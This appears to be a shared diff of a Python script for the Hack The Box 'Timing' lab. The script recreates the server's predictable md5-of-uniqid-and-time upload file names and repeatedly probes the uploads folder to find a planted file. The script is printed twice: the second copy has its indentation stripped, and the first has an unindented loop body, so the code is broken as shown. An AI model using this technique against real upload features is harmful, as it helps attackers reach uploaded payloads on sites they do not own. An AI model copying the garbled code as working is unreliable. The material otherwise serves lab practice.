0xj0y · January 9, 2022 05:11
diff --git a/HTB_timing_filenamefinder.py b/HTB_timing_filenamefinder.py
 #!/usr/bin/python3

 import subprocess
 import requests

 def fuzz(file_name):
    url = 'http://timing.htb/images/uploads/' + file_name
    res = requests.get(url)
    if res.status_code != 404:
        print(f'[+] Found the file at {url}')
        return True
 def main():
    while True:
    command = "/usr/bin/php -r \"\$file_hash=uniqid(); \$file_name=md5('\$file_hash' . time()) . '_' . basename('test.jpg'); echo \$file_name;\""
    string = subprocess.Popen(command, shell = True, stdout = subprocess.PIPE)
    binary_name = string.stdout.read()
    file_name = binary_name.decode('utf-8')
    if fuzz(file_name):
        break

 if __name__=='__main__':
    try:
        main()
    except KeyboardInterrupt:
        pass
	#!/usr/bin/python3

	import subprocess
	import requests

	def fuzz(file_name):
	url = 'http://timing.htb/images/uploads/' + file_name
	res = requests.get(url)
	if res.status_code != 404:
	print(f'[+] Found the file at {url}')
	return True
	def main():
	while True:
	command = "/usr/bin/php -r \"\$file_hash=uniqid(); \$file_name=md5('\$file_hash' . time()) . '_' . basename('test.jpg'); echo \$file_name;\""
	string = subprocess.Popen(command, shell = True, stdout = subprocess.PIPE)
	binary_name = string.stdout.read()
	file_name = binary_name.decode('utf-8')
	if fuzz(file_name):
	break

	if __name__=='__main__':
	try:
	main()
	except KeyboardInterrupt:
	pass